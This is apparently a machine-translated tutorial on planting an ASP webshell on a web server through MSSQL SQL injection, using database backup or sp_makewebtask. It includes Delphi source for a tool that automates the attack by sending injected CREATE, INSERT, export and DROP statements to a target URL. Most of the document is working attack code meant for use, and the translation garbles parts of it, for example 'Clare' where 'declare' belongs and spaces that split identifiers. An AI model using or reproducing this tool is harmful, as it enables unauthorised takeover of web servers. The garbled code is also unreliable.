Obtain WEBSHELL through SQL Injection

1. How to obtain WEBSHELL through SQL injection:
Method of N. E. V. E. R: Use Database Backup to obtain WEBSHELL. Create a table and create a field in the table to save Trojan data. Use MSSQL to export the entire data and then delete the new table.
Analysis: N. E. V. E. R uses the backup database function of MSSQL. Export the data. Assume that the database contains ASP benchmarks such as <%>, export files, and save the file names in. ASP format. Then the file is saved in the WEB path. Is the exported ASP file going to explain the statements in <%>? If some tables in the database have a <%> identifier and an error occurs, the exported ASP file will also be incorrect. However, this opportunity is not big either.
Let's take a look at the CZY method.
CZY method: The preceding methods are similar to those of N. E. V. E. R. The extended stored procedure -- sp_makewebtask is used later. The function of this extended stored procedure is to export records from a table in the MSSQL database and save them as files. This method will not cause any problems because: We only read the value of a field in the table. Export the field information to generate a file. The values in this field are all just added. When you add data, debug it first. If there is no problem, add it. If it is exported, there will be no problem.
I have manually tested the above two methods. Use the SQL injection vulnerability to create a table, add data to the table, export data, and delete the table. All are SQL statements used. I will not talk about it here. You can read this article.
II. Introduction to implementing functions using DELPHI
The principles have been analyzed. How can we use DELPHI to implement their manual operations? In fact, the method is very simple. DELPHI provides an NMHTTP control. We can use this control to submit parameters to a specific URL. Then implement our automatic injection function. The program I will explain to you soon has a special feature. It can also be said to be a defect. The program does not automatically guess the absolute path of the WEB. The program does not determine the permissions of the current account that is currently connected to the SQL database. Why am I doing this? It is very difficult to use SQL injection to obtain the two. Therefore, our program will not consider too many commands. If it is not successful, you can execute it yourself to see if it is generated.
3. How to Use DELPHI to obtain WEBSHELL.
The value used in the program. Let's take a look at the URL path and the remote absolute WEB path (which can be obtained through other methods, you must have a solution). What method is used to get WEBSHELL (that is, the two methods, which one do you choose ). We also need to click a button to start executing the command, and click a button to terminate the current life. The name of the newly created table and the field name of the table are the type of the field again. In the previous step, we put the input in the program and select the control. Next we will set an option to click the button to bring up the corresponding settings. Then, use a RECORD to save these settings.
First, let's go to the DIT control. The names are: the URL path input box, the ShellPathET // remote Trojan location, and the CustomBdoorET // custom Trojan location. Two more RadioButton options are used to obtain the WEBSHELL. CAPTION names are BackUP DataBase and WEB job. Then put three SpeedButtion buttons. The names are: Set, start, stop, and finally put another MEMO control. To display the information currently added. The work on this interface is complete. Interface
Now I want to write a program.
First, we define a RECORD.
As follows:
Type
SetOption = Record
TableName: String; // used to save the name of the table to be created.
FieldName: String; // used to save the field name to be created.
FiledType: String; // used to save the field name type.
End;
The FiledType field type value is one of the following types:
Bigint binary bit char datetime decimal float image int money nchar ntext numeric nvarchar real smalldatetime smallint
Smallmoney SQL _variant text timestamp tinyint uniqueidentifier varbinary varchar these are MSSQL field type values.
Define another global variable:
Var
ISStop: Boolean; // used to determine whether the user has pressed the stop button.
Okay. During form creation, we enter the default value for RECORD records.
The Code is as follows:
Procedure TMainForm. FormCreate (Sender: TObject );
Begin
SOption. TableName: = 'cyfd'
SOption. FieldName: = 'gmemo'
SOption. FiledType: = 'text'
End;
Now we add the code to start executing the command.
First, define BDoorList as TstringList. The main purpose is to add the trojan content.
Create two variables to save the values of urlET. And ShellPathET.
Before running the program, check the user input.
Define a Checkinput function.
As follows:
Function CheckInput: Boolean;
Begin
Result: = False;
If Trim (urlet. Text) = ''then
Begin
Application. MessageBox ('enter the URL address! ',' Hint ', mb_ OK + mb_iconinformation );
Exit;
End;
If Trim (ShellPathET. Text) = ''then
Begin
Application. MessageBox ('enter the file storage address! ',' Hint ', mb_ OK + mb_iconinformation );
Exit;
End;
IF DefBDoor. Checked then
Begin
If Not fileexists(extractfilepath(application.exename=}'trojan .txt ') then
Begin
Application. MessageBox ('the trojan file cannot be found! ',' Hint ', mb_ OK + mb_iconinformation );
Exit;
End;
End
Else
If Not FileExists (CustomBdoorET. Text) then
Begin
Application. MessageBox ('the selected Trojan file is not found! ',' Hint ', mb_ OK + mb_iconinformation );
Exit;
End;
Result: = True;
End;
First join:
IF Not CheckInput then Exit; // Exit the process IF the input is invalid.
Well, if there is nothing wrong with the user input, we will come to the following code.
First, we set IsStop to false. Create BdoorList.
BDoorList: = TstringList. Create;
Add Trojan content to BDoorlist.
BDoorList. LoadFromFile (CustomBdoorET. text );
Well, here I would like to share with you: when submitting data using NMHTTP, we need to convert some of the entered special symbols into code. Here we will replace the space and the % symbol with the corresponding encoding: % 20 and % 25, respectively. Otherwise, the program will not add data.
The Code is as follows:
BDoorList. Text: = StringReplace (BDoorList. Text, '%', '% 25', [rfReplaceAll]);
BDoorList. Text: = StringReplace (BDoorList. Text, '', '% 20', [rfReplaceAll]);
Next, we will provide the table creation function.
Memo. Lines. Add ('create a table ...');
Memo. lines. add (''); NMHttp. get (Url + 'create % 20 TABLE % 20 [dbo]. ['+ sOption. tableName + '] % 20 ([' + sOption. fieldName + '] % 20 [' + sOption. filedType + ']);');
In this way, a table is created. Then, we add records to the table:
The Code is as follows:
Memo. Lines. Add ('add data ...');
Memo. Lines. Add ('');
For I: = 0 to BDoorList. Count-1 do // here we use a loop to add the trojan content to the table.
Begin
IF IsStop then // IF you click STOP button, the task is terminated.
Begin
BDoorList. Free;
Exit;
End; NMhttp. get (Url + 'insert % 20 into % 20' + sOption. tableName + '% 20 (' + sOption. fieldName + ') % 20 values % 20 (''' + BDoorList. strings + ''');');
Memo. Lines. Add ('addline' + Inttostr (I + 1 ));
End;
Now export data to generate a Trojan.
Memo. Lines. Add ('export data ...');
Memo. Lines. Add ('');
IF BKData. Checked then // IF backup data is selected, run the following command.
NMhttp. get (Url + 'Clare % 20 @ a % 20 sysname; select % 20 @ a = db_name (); backup % 20 database % 20 @ a % 20to % 20 disk = ''' + ShellPath + '''')
Else // if it is in the form of a WEB job. NMhttp. get (Url + 'execute % 20sp_makewebtask % 20 @ outputfile = ''' + ShellPath + ''', @ query = ''' + 'select % 20' + sOption. fieldName + '% 20 from % 20' + sOption. tableName + '''');
We will delete the newly created table. NMHttp. Get (Url + 'drop % 20 TABLE % 20 [dbo]. ['+ sOption. TableName +']; ');
This completes the task. Release the variable.
BDoorList. Free;
Then add a click event to the stop button:
One line of code is enough: IsStop: = True;
Here, the content of the main form is basically complete. Now let's take a look at how to set in the settings form. it is actually very simple. a record has been defined in the main form. we only need to assign the new value entered by the user to the RECORD again.
In the settings form, the main form is referenced first. Then, two EDIT controls are added to the interface:
First name: TableNameET // Save the temporary table entered by the user
The second name is FieldNameET // used to save the field name entered by the user.
Add a Combobox // to save the field type value selected by the user.
Name: FieldTypeCombox
OK. The interface is as follows:
The Code is as follows:
Define a process. The main form calls this setting.
Procedure ShowSet;
Begin
Application. CreateForm (TSetForm, SetForm );
With SetForm do
Begin
TableNameET. Text: = sOption. TableName;
FieldNameET. Text: = sOption. FieldName;
FieldTypeCombox. ItemIndex: = FieldTypeCombox. Items. IndexOf (sOption. FiledType );
End;
SetForm. ShowModal;
SetForm. Free;
End;
Add the showset process to the click event set in the main form.
Click "OK.
IF CheckInput then
Begin
SOption. TableName: = Trim (TableNameET. Text); // assign user input to RECORD.
SOption. FieldName: = Trim (FieldNameET. Text );
SOption. FiledType: = FieldTypeCombox. Text;
Close;
End;
Here there is another CheckInput mainly used to check whether the value entered by the user is valid.
The Code is as follows:
Function CheckInput: Boolean;
Begin
Result: = False;
IF Trim (TableNameET. Text) = ''then
Begin
Application. MessageBox ('enter the temporary table name! ',' Hint ', mb_ OK + mb_iconinformation );
Exit;
End;
IF Trim (FieldNameET. Text) = ''then
Begin
Application. MessageBox ('enter the field name! ',' Hint ', mb_ OK + mb_iconinformation );
Exit;
End;
Result: = True;
End;
The program is finished here.